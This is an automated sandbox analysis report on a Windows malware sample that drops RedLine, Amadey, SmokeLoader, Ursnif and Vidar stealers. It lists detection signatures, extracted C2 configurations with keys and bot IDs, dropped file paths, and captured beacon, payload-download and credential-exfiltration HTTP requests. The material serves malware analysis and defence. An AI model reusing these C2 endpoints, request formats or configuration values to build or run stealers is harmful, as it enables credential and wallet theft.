Windows Analysis Report
S2XJ2wbz7u.exe

Overview

General Information

Sample Name: S2XJ2wbz7u.exe
Analysis ID: 749806
MD5: ffb4cf34b38f126c917e1c1e1d26df73
SHA1: 36e558fdb10418aa971aea3f02d6ba1f4d566ed2
SHA256: 4a47fdbb09dd09ea813c0475d32f693cbbded09b3753def43179f91e1a8f8a55
Tags: exeRedLineStealer
Infos:

Detection

Ursnif, Amadey, RedLine, SmokeLoader, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Opens the same file many times (likely Sandbox evasion)
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Injects code into the Windows Explorer (explorer.exe)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Connects to a URL shortener service
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
PE file contains an invalid checksum
Uses cacls to modify the permissions of files
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://91.213.50.70/Wavafursq.jpeg Avira URL Cloud: Label: malware
Source: http://116.202.5.101:80 Avira URL Cloud: Label: malware
Source: http://193.56.146.174/g84kvj4jck/index.php?scr=1kvj4jck/index.php Avira URL Cloud: Label: malware
Source: http://193.56.146.174/g84kvj4jck/index.php?scr=1 Avira URL Cloud: Label: malware
Source: http://193.56.146.174/g84kvj4jck/Plugins/cred64.dllming Avira URL Cloud: Label: malware
Source: http://193.56.146.168/mia/solt.exe Avira URL Cloud: Label: malware
Source: http://91.213.50.70/Wavafursq.jpeg&BKl: Avira URL Cloud: Label: malware
Source: http://193.56.146.174/g84kvj4jck/Plugins/cred64.dlltE Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Avira: detection malicious, Label: HEUR/AGEN.1233121
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll Avira: detection malicious, Label: HEUR/AGEN.1233121
Multi AV Scanner detection for domain / URL
Source: o36fafs3sn6xou.com Virustotal: Detection: 15% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll ReversingLabs: Detection: 88%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll Metadefender: Detection: 71% Perma Link
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\453D.exe ReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll ReversingLabs: Detection: 88%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Metadefender: Detection: 71% Perma Link
Machine Learning detection for sample
Source: S2XJ2wbz7u.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\3790.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\tiddsjj Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\453D.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\816F.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\59FE.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6644.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 21.3.6CEC.exe.6c0000.0.unpack Avira: Label: TR/Downloader.Gen2
Source: 19.3.6644.exe.940000.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 19.2.6644.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen7
Source: 19.2.6644.exe.930e67.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://t.me/deadftx", "https://www.tiktok.com/@user6068972597711"], "Botnet": "1148", "Version": "55.7"}
Source: 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: RedLine {"C2 url": "185.106.92.111:2510", "Bot Id": "New2022", "Authorization Header": "ef6fe7baf59e3191ff2f569e3bf0e2c7"}
Source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://o3l3roozuidudu.com/", "http://o3npxslymcyfi2.com/", "http://o3b1wk8sfk74tf.com/"]}
Source: 00000013.00000002.525358193.0000000000930000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "9YTR8AStfTOVxekPy7nye/rJL/CYnuMKiTBMit/N9dFJomCZQw3gdJ20hYjZiaY5PCNTRgc/z2gXfPlfCRRq0/mF+oSBOgliUoJHNN6O1Nl/zAv1hC+MVoITbvAJoj6LnOzFs9h/l3E4DMphz+dHiiDgppDXx4StPfi30EoQByvOIhjndZV3g8kYMJyGj8dxlmi3X9wSz6RHT9/HWCOS/i2phbREwr7oohHwh6mObxVhJVx0tZ18f2U+SsDunGdf1nLcyWHfM0cx6e8zBNRaXlZ1HhTEFzQdz5EF2h+r74n2bFODhb+ozhtKQ1CBEf0hf+5D8mLZuH2C+VOO+s90bjJxpTvGseErYwzAwE2lC4o=", "c2_domain": ["lentaphoto.at", "iujdhsndjfks.ru", "gameindikdowd.ru", "jhgfdlkjhaoiu.su"], "botnet": "20", "server": "50", "serpent_key": "izoHlMTDxrB6IFB3", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Unpacked PE file: 12.2.2B4A.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\3790.exe Unpacked PE file: 13.2.3790.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Unpacked PE file: 15.2.rovwer.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\6644.exe Unpacked PE file: 19.2.6644.exe.400000.0.unpack
Uses 32bit PE files
Source: S2XJ2wbz7u.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 108.167.141.212:443 -> 192.168.2.3:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 148.251.234.93:443 -> 192.168.2.3:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.96.151.51:443 -> 192.168.2.3:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 45.154.253.151:443 -> 192.168.2.3:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.217.206.73:443 -> 192.168.2.3:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 43.231.112.109:443 -> 192.168.2.3:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.96.151.53:443 -> 192.168.2.3:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 45.154.253.151:443 -> 192.168.2.3:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.216.243.155:443 -> 192.168.2.3:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49806 version: TLS 1.2
Source: Binary string: C:\lulubob99\yu.pdb source: 3790.exe, 0000000D.00000000.396647319.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, rovwer.exe, 0000000F.00000000.410516994.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000002.519144240.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000000.438994801.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, 3790.exe.1.dr, rovwer.exe.13.dr
Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 3790.exe, 0000000D.00000002.412472703.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, 3790.exe, 0000000D.00000002.415736878.0000000000870000.00000040.00001000.00020000.00000000.sdmp, 3790.exe, 0000000D.00000003.404528480.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.520940016.0000000000400000.00000040.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\cekezuca_v.pdb source: 6644.exe, 00000013.00000000.423486676.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, 6644.exe.1.dr
Source: Binary string: /.pdb source: 2B4A.exe, 0000000C.00000002.517632493.0000000000197000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: ?C:\lulubob99\yu.pdbQ source: 3790.exe, 0000000D.00000000.396647319.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, rovwer.exe, 0000000F.00000000.410516994.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000002.519144240.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000000.438994801.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, 3790.exe.1.dr, rovwer.exe.13.dr
Source: Binary string: _.pdb source: 2B4A.exe, 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.561654188.000000000227A000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\android.annotation.TestApi.module1 - Copy.pdb source: 816F.exe, 0000001A.00000000.437232628.0000000000192000.00000002.00000001.01000000.00000011.sdmp, 816F.exe.1.dr
Source: Binary string: (P&gHC:\Windows\System.ServiceModel.pdb source: 2B4A.exe, 0000000C.00000002.517632493.0000000000197000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\tahaf\to.pdbQ source: S2XJ2wbz7u.exe, tiddsjj.1.dr
Source: Binary string: C:\tahaf\to.pdb source: S2XJ2wbz7u.exe, tiddsjj.1.dr
Source: Binary string: SC:\vum\nuzuyo.pdb source: 2B4A.exe, 0000000C.00000000.390215303.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 2B4A.exe.1.dr
Source: Binary string: C:\vum\nuzuyo.pdb source: 2B4A.exe, 0000000C.00000000.390215303.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 2B4A.exe.1.dr
Source: Binary string: @C:\cekezuca_v.pdb source: 6644.exe, 00000013.00000000.423486676.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, 6644.exe.1.dr
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: cdn-102.anonfiles.com
Source: C:\Windows\explorer.exe Domain query: bitbucket.org
Source: C:\Windows\explorer.exe Domain query: bbuseruploads.s3.amazonaws.com
Source: C:\Windows\explorer.exe Domain query: u.to
Source: C:\Windows\explorer.exe Domain query: github.com
Source: C:\Windows\explorer.exe Domain query: raw.githubusercontent.com
Source: C:\Windows\explorer.exe Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe Domain query: o36fafs3sn6xou.com
Source: C:\Windows\explorer.exe Domain query: anonfiles.com
Source: C:\Windows\explorer.exe Domain query: hoteldostyk.com
Source: C:\Windows\explorer.exe Domain query: iplogger.com
Source: C:\Windows\explorer.exe Network Connect: 89.208.107.216 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: srshf.com
Source: C:\Windows\explorer.exe Domain query: transfer.sh
Source: C:\Windows\explorer.exe Domain query: 1ecosolution.it
Source: C:\Windows\explorer.exe Network Connect: 193.56.146.168 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: cdn-104.anonfiles.com
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.3:49725 -> 77.232.37.228:80
Source: Traffic Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.3:49729 -> 77.232.37.228:80
Source: Traffic Snort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.3:49733 -> 77.232.37.228:80
Source: Traffic Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.3:49738 -> 89.208.107.216:80
May check the online IP address of the machine
Source: C:\Windows\explorer.exe DNS query: name: iplogger.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 185.106.92.111:2510
Source: Malware configuration extractor URLs: http://o3l3roozuidudu.com/
Source: Malware configuration extractor URLs: http://o3npxslymcyfi2.com/
Source: Malware configuration extractor URLs: http://o3b1wk8sfk74tf.com/
Source: Malware configuration extractor URLs: https://t.me/deadftx
Source: Malware configuration extractor URLs: https://www.tiktok.com/@user6068972597711
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /1148 HTTP/1.1Host: 116.202.5.101
Source: global traffic HTTP traffic detected: GET /659169136515.zip HTTP/1.1Host: 116.202.5.101Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODI4MjM=Host: 193.56.146.174Content-Length: 82975Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /g84kvj4jck/Plugins/cred64.dll HTTP/1.1Host: 193.56.146.174
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Host: 193.56.146.174Content-Length: 21Content-Type: application/x-www-form-urlencodedData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 63 72 65 64 3d Data Ascii: id=853321935212&cred=
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 30 36 35 33 36 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=065367&un=user&dm=&av=13&lv=0&og=0
